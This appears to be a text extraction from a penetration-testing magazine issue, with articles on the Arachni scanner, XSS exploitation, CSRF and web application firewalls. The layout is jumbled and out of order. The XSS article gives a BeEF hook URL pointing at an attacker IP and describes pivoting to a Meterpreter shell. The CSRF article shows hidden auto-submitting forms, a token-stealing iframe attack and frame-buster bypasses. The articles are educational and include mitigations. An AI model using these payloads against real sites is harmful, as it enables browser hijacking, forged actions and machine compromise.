This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (hermanstevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS – BeEF – Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1. User enters a script in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side, or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane, and then click on Standard Modules – Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So as you can see, because of BeEF, even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server-Side PHP Code:

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text input, the attacker enters a simple JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF – Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now though is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The jobs command
Figure 10. Metasploit after clicking Send Now
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point in time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port-scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13 Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
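To illustrate the encoding step, here is a minimal Ruby sketch using the standard library's CGI.escapeHTML (the vulnerable PHP page shown earlier would use the equivalent htmlspecialchars() call); the function name is made up for the example:

```ruby
require 'cgi'

# Encode user-controlled data before reflecting it back, so injected
# markup is rendered as inert text instead of being executed.
def render_search_result( user_input )
  "The parameter passed is #{CGI.escapeHTML( user_input )}"
end

puts render_search_result( '<script>alert(document.domain)</script>' )
# The angle brackets come out as &lt; and &gt;, so no script runs.
```

With this in place, the popup payload from the POC above is displayed as harmless text in the browser.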
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user input, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
Referrer checking: some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make users stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a webpage form's hidden field and in a session at the same time, to compare them after the form submission.
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection
<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like
       www.evil.com" />
<input type="submit" />
</form>
<script>document.Form.submit();</script>
</div>
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
index.php (victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;
Browser settings are not hard to modify. So the best way to ensure web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
Attempts to subvert one-time tokens are usually accomplished by brute-force attacks. Brute-force attacks against one-time tokens are useful only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
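For comparison, here is the same idea sketched in Ruby (not from the article): SecureRandom yields a token that cannot realistically be brute-forced, and the byte-by-byte comparison takes constant time. All function names here are made up for the sketch.

```ruby
require 'securerandom'

# Generate an unpredictable one-time token; store it both in the
# session and in the form's hidden field.
def generate_token
  SecureRandom.hex( 16 )  # 128 bits of randomness, 32 hex chars
end

# Constant-time comparison of the submitted token against the session
# copy, so an attacker cannot learn the token from response timing.
def token_valid?( session_token, submitted )
  return false if session_token.nil? || submitted.nil?
  return false unless session_token.bytesize == submitted.bytesize
  diff = 0
  session_token.bytes.zip( submitted.bytes ) { |a, b| diff |= a ^ b }
  diff.zero?
end

token = generate_token
puts token_valid?( token, token )    # true
puts token_valid?( token, 'guess' )  # false
```

The equality check in the PHP listings below plays the same role as token_valid? here; the constant-time variant is simply a hardening of it.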
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request!";
}
?>
And common counter-action statements are these
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. Then he seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethics, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has transformed his job to a higher level and he is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private as well as our working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms, up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of, and more powerful, applications that provide the internet user with the required functions as fast and as simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications, without having subjected them to prior security and qualification tests, is dangerous. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby

First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how deep their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications and, as such, to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications. In addition, the internet also offers many possibilities for concealment and for making actions anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies, in the first years of web usage in particular.
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
WEB APPLICATION CHECKING
Page 40 · http://pentestmag.com · 01/2011 (1) November
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have started to combine these methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better; instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch the weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then have to bring the security of older web applications up to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of introducing mistakes. Another example is programs that do not use only the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
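The Session Fixation point can be illustrated with a short sketch (not from the article; the class and method names are invented for illustration): if the application migrates the session data to a freshly generated ID at login, an ID planted by an attacker before login never becomes an authenticated one.

```ruby
require 'securerandom'

# Illustrative in-memory session table; a real application would use
# the session handling of its framework.
class SessionStore
  def initialize
    @sessions = {}
  end

  # Issue a fresh anonymous session, e.g. on the first visit.
  def create
    id = SecureRandom.hex(16)
    @sessions[id] = { authenticated: false }
    id
  end

  # On successful login, migrate the data to a NEW id and drop the old
  # one, so a fixated pre-login id is worthless afterwards.
  def login(old_id)
    data = @sessions.delete(old_id)
    return nil unless data
    new_id = SecureRandom.hex(16)
    @sessions[new_id] = data.merge(authenticated: true)
    new_id
  end

  def authenticated?(id)
    s = @sessions[id]
    !!(s && s[:authenticated])
  end
end
```

An application that keeps the pre-login ID after authentication fails exactly this check, which is what makes retrofitting the behavior into old code expensive.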
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are to be developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by this time correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more safely a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF it is still recommendable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas (single quotes). It would be a costly procedure to correct this error in the web application; if a WAF is also deployed as a protective system, it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing Web Application Security.
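Why quote-filtering alone is not enough can be shown in a few lines (a sketch with invented function names, not any vendor's rule syntax): stripping quotes defeats the classic quoted probe, but an injection into a numeric context needs no quotes at all.

```ruby
# Naive WAF rule: strip single quotes from the input.
def strip_quotes(input)
  input.delete("'")
end

# Vulnerable pattern: untrusted value concatenated into a numeric
# context, so no quotes are needed to alter the query logic.
def build_query(id_param)
  "SELECT * FROM orders WHERE id = #{id_param}"
end

filtered = strip_quotes('1 OR 1=1')  # nothing to strip: passes unchanged
query    = build_query(filtered)     # the injection survives the filter
```

The quoted probe `1' OR '1'='1` is neutralized, yet `1 OR 1=1` sails straight through, which is why the rules must be matched to the application rather than applied blindly.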
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as their maximum length, valid number of characters and permitted value range.
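Such per-form parameter rules can be sketched as follows (a simplified illustration; the rule table and parameter names are invented and do not reflect any particular WAF's configuration format):

```ruby
# Expected parameters for one monitored form: a maximum length and an
# allowed character class per parameter.
RULES = {
  'user'  => { max_len: 32, pattern: /\A[a-zA-Z0-9_]+\z/ },
  'email' => { max_len: 64, pattern: /\A[^@\s]+@[^@\s]+\z/ }
}

def request_allowed?(params)
  # Reject unknown or extra parameters outright, mirroring the
  # "block requests with three or more parameters" example.
  return false unless params.keys.all? { |k| RULES.key?(k) }
  # Then enforce length and character-class limits per parameter.
  params.all? do |name, value|
    rule = RULES[name]
    value.length <= rule[:max_len] && value =~ rule[:pattern]
  end
end
```

Even this crude whitelist already stops oversized values, injected quotes and smuggled-in extra parameters before they reach the application.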
Of course, an integrated XML Firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also mitigates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is sent to the web application.
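A nested-elements check of the kind an XML firewall performs can be sketched in a few lines (an illustration only, assuming a simple depth limit; a real XML firewall enforces many more limits, e.g. on entity expansion and attribute counts):

```ruby
require 'rexml/parsers/pullparser'

# Stream-parse the document and track element nesting depth; a
# nested-elements attack sends absurdly deep documents to exhaust
# the backend parser, so the check aborts past a configured limit.
def max_depth(xml, limit: 100)
  parser = REXML::Parsers::PullParser.new(xml)
  depth = 0
  max = 0
  while parser.has_next?
    event = parser.pull
    case event.event_type
    when :start_element
      depth += 1
      max = [max, depth].max
      raise 'nesting limit exceeded' if depth > limit
    when :end_element
      depth -= 1
    end
  end
  max
end
```

Because the check runs on the stream, the oversized document is rejected before it is ever handed to the application's own parser.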
Figure 2 An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that are in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Certain special functions are also only available here: as a Full Reverse Proxy, a WAF provides for example Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses and, as such, the rewriting of the URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to mitigate Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks with which attackers seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But the Proxy WAFs must also be configured in accordance with the respective requirements; penetration tests help with the correct configuration.
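The URL translation described above can be sketched as a simple mapping (the hostnames, ports and paths here are invented for illustration): the public path space is rewritten to the hidden backend URL, so the application's real location and technology never appear outside.

```ruby
# Map public paths to the hidden backend. The backend address, with its
# revealing port and .jsp extension, never reaches the client.
REWRITES = {
  %r{\A/shop/(\d+)\z} => 'http://10.0.0.12:8080/legacy-cart/item.jsp?id=\1'
}

def rewrite(public_path)
  REWRITES.each do |pattern, backend|
    return public_path.sub(pattern, backend) if public_path =~ pattern
  end
  nil # no mapping: the request never reaches a backend at all
end
```

As a side effect of the explicit mapping, any path that was never published, such as a probe for /etc/passwd or an admin console, simply has no backend to be forwarded to.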
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
